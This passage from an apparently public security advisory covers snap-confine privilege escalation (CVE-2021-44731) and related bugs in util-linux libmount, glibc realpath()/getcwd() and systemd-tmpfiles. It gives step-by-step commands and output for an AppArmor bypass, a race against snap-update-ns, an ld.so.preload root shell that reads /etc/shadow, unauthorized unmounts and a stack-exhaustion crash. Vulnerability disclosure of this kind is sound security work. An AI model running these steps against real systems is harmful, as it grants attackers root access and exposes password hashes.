> $ cp -i "$(which true)" snap-update-ns
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ gcc -o CVE-2021-44731-Server1 CVE-2021-44731-Server1.c
> $ ./CVE-2021-44731-Server1
> ...
> DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
> DEBUG: apparmor mode is: enforce
> ...
> cannot chmod base directory /tmp/snap.heroku to 0700: Operation not permitted
> ------------------------------------------------------------------------
>
> This first attempt failed, because snap-confine's AppArmor profile
> prevented setup_private_mount() from fchmod()ing our /tmp/snap.heroku
> directory (at line 106):
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [26963.479502] audit: type=1400 audit(1635180724.155:37): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=1712 comm="snap-confine" capability=3  capname="fowner"
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Second, failed attempt
> ________________________________________________________________________
>
> To solve this first, seemingly insurmountable problem, we tried out a
> Crazy! Wild! Wicked! idea -- to execute snap-confine in "unconfined"
> mode, by wrapping it in "aa-exec -p unconfined":
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Server2 CVE-2021-44731-Server2.c
> $ ./CVE-2021-44731-Server2
> ...
> DEBUG: apparmor label on snap-confine is: unconfined
> DEBUG: apparmor mode is: (null)
> snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks
> ------------------------------------------------------------------------
>
> Incredibly, this idea worked out; however, snap-confine's defensive
> programming detected this unconfined execution and called exit().
>
> ________________________________________________________________________
>
> Third, successful attempt
> ________________________________________________________________________
>
> Since snap-confine refuses to run unconfined, but accepts AppArmor
> profiles other than the intended "/usr/lib/snapd/snap-confine" profile,
> we reviewed all AppArmor profiles and noticed that some of them are in
> "complain" mode (for example, "snap.heroku.heroku"):
>
> ------------------------------------------------------------------------
> # aa-status
> apparmor module is loaded.
> 35 profiles are loaded.
> 33 profiles are in enforce mode.
>  ...
> 2 profiles are in complain mode.
>  snap.heroku.heroku
>  ...
> ------------------------------------------------------------------------
>
> These "complain" profiles log policy violations but allow the offending
> program to continue its execution (unlike "kill" or "enforce" profiles);
> we therefore try to wrap snap-confine in "aa-exec -p snap.heroku.heroku"
> to bypass AppArmor:
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Server3 CVE-2021-44731-Server3.c
> $ ./CVE-2021-44731-Server3
> ...
> DEBUG: apparmor label on snap-confine is: snap.heroku.heroku
> DEBUG: apparmor mode is: complain
> ...
> DEBUG: execv(/bin/bash, /bin/bash...)
> DEBUG:  argv[1] = -c
> DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.heroku.heroku /nonexistent
> ...
> DEBUG: moving to mount namespace of pid 1
> ...
> DEBUG: calling snapd tool snap-discard-ns
> ...
> uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
> snap.heroku.heroku (complain)
> ...
> ------------------------------------------------------------------------
>
> This third attempt successfully executed a root shell that is
> effectively unconfined ("snap.heroku.heroku (complain)").
>
> Side note: we tried and failed to exploit CVE-2021-44731 in a default
> installation of Ubuntu Server (i.e., without an extra snap like "heroku"
> or "microk8s"); we faced two problems:
>
> - The "lxd" snap (the only snap installed by default on Ubuntu Server)
>  is started automatically at boot time by snapd; this prevents us from
>  creating /tmp/snap.lxd ourselves. The solution to this first problem
>  is surprisingly easy, because the cron daemon is started before snapd
>  at boot time: we can add an "@reboot touch /tmp/snap.lxd" command to
>  our user's crontab and take ownership of this directory before snapd
>  (on the next reboot).
>
> - No AppArmor profiles are in "complain" mode by default; this prevents
>  us from bypassing AppArmor (the fchmod() at line 106). Interestingly,
>  the check that prevents snap-confine from running unconfined is very
>  fragile (a fail-open check): if aa_is_enabled() fails (if it returns
>  false), then snap-confine assumes that AppArmor is disabled, and
>  allows us to run it unconfined.
>
>  Internally, aa_is_enabled() calls the glibc's setmntent() (fopen()),
>  getmntent() (malloc() and fgets()), and endmntent(); for example, if
>  we set a low RLIMIT_NOFILE resource limit, then this fopen() fails,
>  and snap-confine continues to run unconfined:
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd prlimit --nofile=4 aa-exec -p unconfined -- /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
> ...
> DEBUG: apparmor is not enabled: Too many open files
> cannot open path /proc/1/ns/mnt: Too many open files
> ------------------------------------------------------------------------
>
>  However, this RLIMIT_NOFILE resource limit is so low that subsequent
>  open()s also fail and prevent snap-confine from running normally. We
>  also tried to reach the system-wide limit on open files (fs.file-max)
>  but failed, because systemd increases this limit to LONG_MAX (since
>  version 240). We also tried to cause a failure in setmntent() or
>  getmntent() by lowering the RLIMIT_DATA resource limit, but also
>  failed.
>
>  If you, dear reader, find a solution to this second problem, please
>  post it to the public oss-security mailing list!
>
>
>
> ========================================================================
> Case study: Ubuntu Desktop, default installation
> ========================================================================
>
>  If at first you don't succeed..
>  -- Lemmings, Taxing Level 1
>
> To exploit CVE-2021-44731 in a default installation of Ubuntu Desktop,
> we execute snap-confine with the "snap-store" snap (the only snap that
> is installed by default) and we bypass AppArmor with one of the default
> "complain" profiles (for example, "libreoffice-soffice").
>
> Still, inside its sandbox, snap-confine applies one of snap-store's
> "enforce" profiles (for example, "snap.snap-store.snap-store"), which
> prevents us from successfully executing /tmp/snap-confine and therefore
> prevents us from reusing our Ubuntu-Server exploitation technique:
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-44731-Desktop0 CVE-2021-44731-Desktop0.c
> $ ./CVE-2021-44731-Desktop0
> ...
> DEBUG: apparmor label on snap-confine is: libreoffice-soffice
> DEBUG: apparmor mode is: complain
> ...
> DEBUG: execv(/bin/bash, /bin/bash...)
> DEBUG:  argv[1] = -c
> DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.snap-store.snap-store /nonexistent
> ...
> DEBUG: apparmor is available but the interface but the interface is not available
> cannot read mount namespace identifier of pid 1: Permission denied
> ------------------------------------------------------------------------
>
> Belatedly, we realized that the setup of snap-store's mount namespace is
> extremely complicated; indeed, snap-confine executes the helper program
> snap-update-ns twice:
>
> - a first time, to set up the "system" bind-mounts listed in
>  /var/lib/snapd/mount/snap.snap-store.fstab;
>
> - a second time, to set up the "user" bind-mounts listed in
>  /var/lib/snapd/mount/snap.snap-store.user-fstab.
>
> Among those system bind-mounts, one in particular caught our attention:
>
>  /var/lib/snapd/hostfs/var/lib/app-info /var/lib/app-info none bind,ro 0 0
>
> To set up this bind-mount, snap-update-ns must first create the
> directory /var/lib/app-info; but inside snap-store's mount namespace,
> /var/lib is in a read-only filesystem (the "core18" base's squashfs).
> Consequently, snap-update-ns must first create a "mimic" -- a writable
> copy of /var/lib:
>
> 1/ it bind-mounts /var/lib onto /tmp/.snap/var/lib (inside snap-store's
> mount namespace);
>
> 2/ it mounts a tmpfs onto /var/lib;
>
> 3/ it bind-mounts every directory entry from /tmp/.snap/var/lib back
> into /var/lib;
>
> 4/ it creates the directory /var/lib/app-info (which is in a writable
> tmpfs now);
>
> 5/ it bind-mounts /var/lib/snapd/hostfs/var/lib/app-info onto
> /var/lib/app-info.
>
> Unfortunately, because we own /tmp inside snap-store's mount namespace
> (thanks to CVE-2021-44731), we can race against snap-update-ns between
> 1/ and 3/ and replace /tmp/.snap/var/lib -- and hence /var/lib -- with
> our own directory tree.
>
> Note: we can reliably win this race condition by "single-stepping"
> snap-confine (we execute it with SNAPD_DEBUG=1, we redirect its stderr
> to an AF_UNIX socket with minimized SO_RCVBUF and SO_SNDBUF, we read()
> its output byte by byte, and we MSG_PEEK at its buffered output).
>
> This race condition allows us to replace
> /var/lib/snapd/mount/snap.snap-store.user-fstab with our own fstab file,
> which allows us to set up near-arbitrary bind-mounts inside snap-store's
> mount namespace. These bind-mounts are not completely arbitrary, because
> they are restricted by the "snap-update-ns.snap-store" AppArmor profile,
> whose most interesting rules are:
>
> ------------------------------------------------------------------------
>  170   mount options=(rbind, rw) /tmp/.snap/*/ -> /*/,
>  ...
>  762   mount options=(rbind, rw) /tmp/.snap/var/lib/*/ -> /var/lib/*/,
> ------------------------------------------------------------------------
>
> Our action plan, then, is:
>
> - we create a copy of /etc (minus the unreadable files like /etc/shadow)
>  into /tmp/.tmp/.snap/etc (which will become /tmp/.snap/etc inside
>  snap-store's mount namespace);
>
> - we create a file /tmp/.tmp/.snap/etc/ld.so.preload (which contains the
>  library name "/tmp/librootshell.so"), and we create a shared library
>  /tmp/.tmp/librootshell.so (which will become /tmp/librootshell.so
>  inside snap-store's mount namespace);
>
> - we bind-mount our /tmp/.tmp onto /tmp (inside snap-store's mount
>  namespace) by exploiting CVE-2021-44731 (note: /tmp/snap.snap-store
>  does not normally exist, but if it does, we can use our "@reboot"
>  crontab trick to create it ourselves on the next reboot);
>
> - we bind-mount the contents of /tmp/.tmp/.snap/var/lib into /var/lib
>  (inside snap-store's mount namespace) by exploiting the race condition
>  between 1/ and 3/ in snap-update-ns;
>
> - we add the following bind-mount line to our
>  /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab (which
>  is effectively /var/lib/snapd/mount/snap.snap-store.user-fstab inside
>  snap-store's mount namespace):
>
>  /tmp/.snap/etc /etc none rbind,rw 0 0
>
> - we execute snap-confine (outside snap-store's mount namespace), which
>  reads our user-fstab file and bind-mounts our copy of /etc (inside
>  snap-store's mount namespace) -- this bind-mount is allowed by line
>  170 of the "snap-update-ns.snap-store" AppArmor profile;
>
> - we execute the SUID-root program /usr/lib/snapd/snap-confine (inside
>  snap-store's mount namespace), which reads our /etc/ld.so.preload and
>  therefore executes our shared library /tmp/librootshell.so, as root --
>  these two operations are allowed by the "snap.snap-store.snap-store"
>  AppArmor profile:
>
> ------------------------------------------------------------------------
>  34   /etc/ld.so.preload r,
>  ...
>  299   /tmp/** mrwlkix,
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> Our first attempt succeeded in bind-mounting our own /etc but failed to
> execute a SUID-root program inside snap-store's mount namespace. Indeed,
> snap-confine's defensive programming detected that /var/lib/snapd does
> not belong to root (it belongs to us, inside snap-store's mount
> namespace), and called exit() (via validate_bpfpath_is_safe()):
>
> ------------------------------------------------------------------------
> $ id
> uid=1001(jane) gid=1001(jane) groups=1001(jane)
>
> $ gcc -o CVE-2021-44731-Desktop CVE-2021-44731-Desktop.c
> $ ./CVE-2021-44731-Desktop
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
>
> $ cp -a /etc /tmp/.tmp/.snap
> $ echo /tmp/librootshell.so > /tmp/.tmp/.snap/etc/ld.so.preload
> $ gcc -fpic -shared -o /tmp/.tmp/librootshell.so librootshell.c
> $ mkdir /tmp/.tmp/.snap/var/lib/snapd/mount
> $ echo '/tmp/.snap/etc /etc none rbind,rw 0 0' > /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
> DEBUG: loading bpf program for security tag snap.snap-store.snap-store
> /var/lib/snapd not root-owned 1001:1001
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Second, successful attempt
> ________________________________________________________________________
>
> The solution to this problem is easy; because the original, root-owned
> bind-mount of /var/lib still exists inside snap-store's mount namespace
> (we merely renamed it, during the race condition between 1/ and 3/), we
> can simply rename it back to /tmp/.snap/var/lib, and add the following
> bind-mount line to our user-fstab file:
>
>  /tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0
>
> This bind-mount is allowed by line 762 of the
> "snap-update-ns.snap-store" AppArmor profile, and allows us to change
> the ownership of /var/lib/snapd back to root, and to execute a SUID-root
> program inside snap-store's mount namespace (and hence our own shared
> library, as root):
>
> ------------------------------------------------------------------------
> $ echo '/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0' >> /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab
> $ mv -i /tmp/.tmp/.snap/var/lib /tmp/.tmp/.snap/var/lib.exchange2
> $ mv -i /tmp/.tmp/.snap/var/lib.exchange /tmp/.tmp/.snap/var/lib
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
> DEBUG: loading bpf program for security tag snap.snap-store.snap-store
> DEBUG: read 6392 bytes from /var/lib/snapd/seccomp/bpf//snap.snap-store.snap-store.bin
> ...
> DEBUG: execv(/usr/lib/snapd/snap-confine, /usr/lib/snapd/snap-confine...)
> ...
> ------------------------------------------------------------------------
>
> This second attempt succeeded; our shared library created a SUID-root
> shell /tmp/sh that is reachable outside snap-store's mount namespace via
> /tmp/.tmp/sh:
>
> ------------------------------------------------------------------------
> $ /tmp/.tmp/sh -p
> # id
> uid=1001(jane) gid=1001(jane) euid=0(root) groups=1001(jane)
>                               ^^^^^^^^^^^^
> # wc /etc/shadow
>  49   49 1617 /etc/shadow
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
> ========================================================================
>
>  Get a little extra help
>  -- Oh No! More Lemmings, Tame Level 14
>
> During our work on snap-confine, we explored many different avenues of
> attack; most of them were dead ends, but some of them led us to the
> discovery of vulnerabilities in related packages and libraries. For
> example, we pondered over the beginning of snap-confine's function
> sc_bootstrap_mount_namespace() for a long time:
>
> ------------------------------------------------------------------------
> 223         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
> ...
> 226         if (mkdtemp(scratch_dir) == NULL) {
> ...
> 234         sc_do_mount("none", "/", NULL, MS_REC | MS_SHARED, NULL);
> ...
> 238         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
> ...
> 245         sc_do_mount("none", scratch_dir, NULL, MS_UNBINDABLE, NULL);
> ...
> 254         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
> 255                     NULL);
> ------------------------------------------------------------------------
>
> This function is called after unshare(CLONE_NEWNS) to set up the root
> filesystem inside a snap's mount namespace:
>
> - at lines 223-226, it creates a random, temporary scratch directory
>  /tmp/snap.rootfs_XXXXXX (as root, with permissions 0700) that will
>  become the snap's root filesystem;
>
> - at lines 238-245, it bind-mounts this scratch directory onto itself,
>  and makes it unbindable and private (i.e., subsequent mounts inside
>  this directory will not be visible outside the snap's mount
>  namespace);
>
> - at lines 254-255, it bind-mounts the snap's root filesystem onto this
>  scratch directory (for example, /snap/snapd/current, a read-only
>  squashfs that contains a copy of the SUID-root snap-confine).
>
> Our half-baked idea was: what if we were able to unmount the scratch
> directory's private bind-mount, after line 245 but before line 254? The
> bind-mount of the snap's root filesystem (at lines 254-255) would not be
> private anymore, and would therefore be visible outside the snap's mount
> namespace. In other words, we would be able to execute snap-confine via
> /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, which reminded us
> strongly of our exploit for CVE-2021-44730 (but without a hardlink).
>
> Consequently, we audited the SUID-root programs umount and fusermount
> for ways to unmount a filesystem that does not belong to us, and we
> discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
> (which is used internally by umount).
>
> Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit
> 5fea669 ("libmount: Support unmount FUSE mounts") in November 2018.
>
>
>
> ========================================================================
> CVE-2021-3996: Unauthorized unmount in util-linux's libmount
> ========================================================================
>
> In order for an unprivileged user to unmount a FUSE filesystem with
> umount, this filesystem must a/ be listed in /proc/self/mountinfo, and
> b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current,
> unprivileged user (lines 477-498):
>
> ------------------------------------------------------------------------
>  451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
>  452 {
>  ...
>  466         if (strcmp(type, "fuse") != 0 &&
>  467             strcmp(type, "fuseblk") != 0 &&
>  468             strncmp(type, "fuse.", 5) != 0 &&
>  469             strncmp(type, "fuseblk.", 8) != 0)
>  470                 return 0;
>  ...
>  477         if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
>  478                 return 0;
>  ...
>  490         uid = getuid();
>  ...
>  497         snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
>  498         return strncmp(user_id, uidstr, sz) == 0;
>  499 }
> ------------------------------------------------------------------------
>
> Unfortunately, when parsing /proc/self/mountinfo, libmount blindly
> removes any " (deleted)" suffix from the mountpoint pathnames (at lines
> 231-233):
>
> ------------------------------------------------------------------------
>  17 #define PATH_DELETED_SUFFIX     " (deleted)"
> ------------------------------------------------------------------------
>  179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
>  180 {
>  ...
>  223         /* (5) target */
>  224         fs->target = unmangle(s, &s);
>  ...
>  231         p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
>  232         if (p && *p)
>  233                 *p = '\0';
> ------------------------------------------------------------------------
>
> This vulnerability allows an unprivileged user to unmount other users'
> filesystems that are either world-writable themselves (like /tmp) or
> mounted in a world-writable directory (like /tmp/snap.rootfs_XXXXXX).
> For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE
> filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program,
> ./hello) and unmount /tmp itself (a denial of service):
>
> ------------------------------------------------------------------------
> $ id
> uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> $ grep /tmp /proc/self/mountinfo
> 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
>
> $ mkdir -m 0700 /tmp/" (deleted)"
> $ ./hello /tmp/" (deleted)"
>
> $ grep /tmp /proc/self/mountinfo
> 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
> 620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000
>
> $ mount | grep /tmp
> tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64)
> /home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000)
>
> $ umount -l /tmp/
> $ grep /tmp /proc/self/mountinfo | wc
>  0       0       0
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3995: Unauthorized unmount in util-linux's libmount
> ========================================================================
>
> Alert readers may have spotted another vulnerability in
> is_fuse_usermount(): at line 498, only the first "sz" characters of the
> current user's uid are compared to the filesystem's "user_id" option (sz
> is user_id's length). This second vulnerability allows an unprivileged
> user to unmount the FUSE filesystems that belong to certain other users;
> for example, if our own uid is 1000, then we can unmount the FUSE
> filesystems of the users whose uid is 100, 10, or 1:
>
> ------------------------------------------------------------------------
> $ id
> uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> $ grep fuse /proc/self/mountinfo
> 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
> 620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1
>
> $ umount -l /mnt/bin
> $ grep fuse /proc/self/mountinfo
> 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> Epilogue: snap-confine and CVE-2021-3996 in util-linux's libmount
> ========================================================================
>
> CVE-2021-3996 in libmount allows us to unmount the private bind-mount
> of snap-confine's scratch directory, between lines 245 and 254 (we
> can reliably win this race condition by "single-stepping" snap-confine
> with SNAPD_DEBUG=1), which allows us to execute the bind-mounted program
> /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine. Nonetheless, we were
> unable to reproduce our exploit for CVE-2021-44730 or CVE-2021-44731:
>
> - if we execute snap-confine outside the snap's mount namespace, via
>  /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, then we are unable
>  to provide our own snap-discard-ns program because the directory
>  /tmp/snap.rootfs_XXXXXX already exists and we cannot remove it;
>
> - if we execute snap-confine inside the snap's mount namespace, via
>  /var/lib/snapd/hostfs/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine,
>  then snap-confine enters init's mount namespace (outside the snap's
>  mount namespace) and we are unable to provide our own snap-discard-ns
>  program because the directory /var/lib/snapd/hostfs/tmp does not exist
>  and we cannot create it.
>
> If you, dear reader, find a solution to these problems, please post it
> to the public oss-security mailing list!
>
> Note: CVE-2021-3996 might be exploitable in contexts other than
> snap-confine, but we have not explored this possibility.
>
>
>
> ========================================================================
> CVE-2021-3998: Unexpected return value from glibc's realpath()
> ========================================================================
>
>  Triple Trouble
>  -- Lemmings, Taxing Level 26
>
> While auditing umount and fusermount, we also discovered a vulnerability
> in the glibc's realpath() function, which is used internally by various
> programs. Normally, when the output buffer "resolved" that is passed to
> realpath() is not NULL, then realpath() either returns NULL on failure,
> or it returns the output buffer "resolved" on success. Unfortunately,
> since commit c6e0b0b ("stdlib: Sync canonicalize with gnulib") from
> January 2021, realpath() can mistakenly return a malloc()ated buffer
> that is neither NULL nor the output buffer "resolved":
>
> ------------------------------------------------------------------------
> 430 char *
> 431 __realpath (const char *name, char *resolved)
> 432 {
> ...
> 437   struct scratch_buffer rname_buffer;
> 438   return realpath_stk (name, resolved, &rname_buffer);
> 439 }
> ------------------------------------------------------------------------
> 197 static char *
> 198 realpath_stk (const char *name, char *resolved,
> 199               struct scratch_buffer *rname_buf)
> 200 {
> ...
> 399   failed = false;
> ...
> 403   if (resolved != NULL && dest - rname <= get_path_max ())
> 404     rname = strcpy (resolved, rname);
> ...
> 410   if (failed || rname == resolved)
> 411     {
> 412       scratch_buffer_free (rname_buf);
> 413       return failed ? NULL : resolved;
> 414     }
> 415 
> 416   return scratch_buffer_dupfree (rname_buf, dest - rname);
> 417 }
> ------------------------------------------------------------------------
>
> For example, if the input path "name" is "." and if the current working
> directory is longer than PATH_MAX, then:
>
> - at line 399, "failed" is set to false;
>
> - at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is
>  left untouched and uninitialized (because "dest - rname" is longer
>  than PATH_MAX);
>
> - the code block at lines 410-414 is skipped (because "failed" is false
>  and "rname" is not "resolved");
>
> - at line 416, scratch_buffer_dupfree() returns a malloc()ated buffer
>  that is NOT the output buffer "resolved".
>
> The consequences of this vulnerability depend on the affected programs;
> for example, fusermount (a SUID-root program) can disclose sensitive
> information (pointers) when displaying the contents of a stack-based
> buffer that is mistakenly left uninitialized by realpath() (we tested
> this proof of concept on Ubuntu 21.04):
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c
> $ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output
> ...
>
> $ hexdump -C CVE-2021-3998-fusermount.output
> 00000000  2f 75 73 72 2f 62 69 6e  2f 66 75 73 65 72 6d 6f  |/usr/bin/fusermo|
> 00000010  75 6e 74 3a 20 65 6e 74  72 79 20 66 6f 72 20 f0  |unt: entry for .|
> 00000020  83 9b 99 ff 7f 20 6e 6f  74 20 66 6f 75 6e 64 20  |..... not found |
> 00000030  69 6e 20 2f 65 74 63 2f  6d 74 61 62 0a 0a 2f 75  |in /etc/mtab../u|
> 00000040  73 72 2f 62 69 6e 2f 66  75 73 65 72 6d 6f 75 6e  |sr/bin/fusermoun|
> 00000050  74 3a 20 65 6e 74 72 79  20 66 6f 72 20 39 ac b7  |t: entry for 9..|
> 00000060  a5 a2 7f 20 6e 6f 74 20  66 6f 75 6e 64 20 69 6e  |... not found in|
> 00000070  20 2f 65 74 63 2f 6d 74  61 62 0a 0a              | /etc/mtab..|
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
> ========================================================================
>
>  Down, along, up. In that order
>  -- Lemmings, Mayhem Level 5
>
> While studying the vulnerability in realpath(), we also discovered a
> vulnerability in the glibc's getcwd() function (which is used internally
> by realpath() to resolve relative pathnames) -- an off-by-one buffer
> overflow and underflow, but if and only if the "size" of "buf" is
> exactly 1:
>
> ------------------------------------------------------------------------
>  48 __getcwd (char *buf, size_t size)
>  49 {
>  ..
>  54   size_t alloc_size = size;
>  ..
>  76     path = buf;
>  ..
>  80   retval = INLINE_SYSCALL (getcwd, 2, path, alloc_size);
> ...
> 100   if (retval >= 0 || errno == ENAMETOOLONG)
> 101     {
> ...
> 110       result = __getcwd_generic (path, size);
> ------------------------------------------------------------------------
> 158 __getcwd_generic (char *buf, size_t size)
> 159 {
> ...
> 187   size_t allocated = size;
> ...
> 247     dir = buf;
> 248 
> 249   dirp = dir + allocated;
> 250   *--dirp = '\0';
> ...
> 262   while (!(thisdev == rootdev && thisino == rootino))
> 263     {
> ...
> 441     }
> ...
> 449   if (dirp == &dir[allocated - 1])
> 450     *--dirp = '/';
> ...
> 457   used = dir + allocated - dirp;
> 458   memmove (dir, dirp, used);
> ------------------------------------------------------------------------
>
> If, at line 48, the "size" of "buf" is exactly 1:
>
> - and if, at line 80, the kernel's getcwd() syscall fails with the error
>  ENAMETOOLONG (because the current working directory is longer than
>  PATH_MAX),
>
> - then, at line 110, a generic implementation of getcwd() is called;
>
> - at line 250, a null byte is written to "dirp", which points exactly to
>  "buf" (because "size", and hence "allocated", are exactly 1);
>
> - if the code block at lines 262-441 is skipped entirely (if the current
>  working directory corresponds to the "/" directory),
>
> - then, at lines 449-450, a slash is written to "buf-1" (an off-by-one
>  buffer underflow, because at line 449 "dirp" was still pointing
>  exactly to "buf"),
>
> - and, at lines 457-458, a null byte is written to "buf+1" (an
>  off-by-one buffer overflow, because at line 457 "used" is exactly 2).
>
> It may seem impossible to satisfy the condition at line 100 (the current
> working directory is longer than PATH_MAX) and the condition at line 262
> (the current working directory corresponds to the "/" directory), but in
> reality we can:
>
> - in a child process:
>
>  - create an unprivileged mount namespace;
>
>  - create a directory longer than PATH_MAX;
>
>  - bind-mount "/" onto this directory;
>
>  - open() this directory and send its file descriptor to the parent
>  process (outside the unprivileged mount namespace);
>
> - in the parent process:
>
>  - receive the file descriptor of this directory (which corresponds to
>  "/" and is longer than PATH_MAX) and fchdir() to it;
>
>  - execute a SUID program that calls getcwd() with a buffer of size 1,
>  which triggers the off-by-one buffer overflow and underflow.
>
> Apparently, this vulnerability was introduced in February 1995 by the
> very first commit in the glibc's git history (28f540f, "initial import")
> and could be triggered without an unprivileged mount namespace, by
> simply chdir()ing to the "/" directory:
>
> ------------------------------------------------------------------------
> 190 getcwd (buf, size)
> ...
> 218     path = buf;
> ...
> 226   pathp = path + size;
> 227   *--pathp = '\0';
> ...
> 242   while (!(thisdev == rootdev && thisino == rootino))
> 243     {
> ...
> 351     }
> 352 
> 353   if (pathp == &path[size - 1])
> 354     *--pathp = '/';
> ...
> 359   memmove (path, pathp, path + size - pathp);
> ------------------------------------------------------------------------
>
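> Although "the size of buf is exactly 1" is a strong requirement,
> vulnerable code like the following may exist in the wild (if argv[0]
> is long enough that "len" is exactly sizeof(buf) - 1, then getcwd() is
> called with a "size" of exactly 1):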
>
> ------------------------------------------------------------------------
> #include <unistd.h>
> #include <stdio.h>
>
> int main(int argc, char * argv[]) {
>  char buf[4096];
>  int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv[0]);
>  if (len <= 0 || (unsigned)len >= sizeof(buf)) return __LINE__;
>  if (!getcwd(buf + len, sizeof(buf) - len)) return __LINE__;
>  puts(buf);
>  return 0;
> }
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
> ========================================================================
>
>  The Stack
>  -- Oh No! More Lemmings, Crazy Level 6
>
> While trying to exploit snap-confine via CVE-2021-3996, we explored
> alternative ways to remove the scratch directory /tmp/snap.rootfs_XXXXXX
> (a sufficient, and maybe necessary, condition for a successful exploit).
> We therefore looked into systemd-tmpfiles (which "creates, deletes, and
> cleans up volatile and temporary files and directories") and discovered
> a denial of service (an uncontrolled recursion): if we create thousands
> of nested directories in /tmp, then "systemd-tmpfiles --remove" (when
> executed as root at boot time) will call its rm_rf_children() function
> recursively (on each nested directory) and will exhaust its stack and
> crash. For example, on Ubuntu 21.04:
>
> ------------------------------------------------------------------------
> $ cd /tmp
> $ perl -e 'use strict;
> for (my $i = 0; $i < (1<<15); $i++) {
> mkdir "A", 0700 or die;
> chdir "A" or die; }'
> ------------------------------------------------------------------------
>
> Then, as root (warning: this command may delete important files and
> directories in /tmp; it is normally executed at boot time only):
>
> ------------------------------------------------------------------------
> # systemd-tmpfiles --remove
> Segmentation fault (core dumped)
> ------------------------------------------------------------------------
>
> We have not fully explored the implications of this vulnerability;
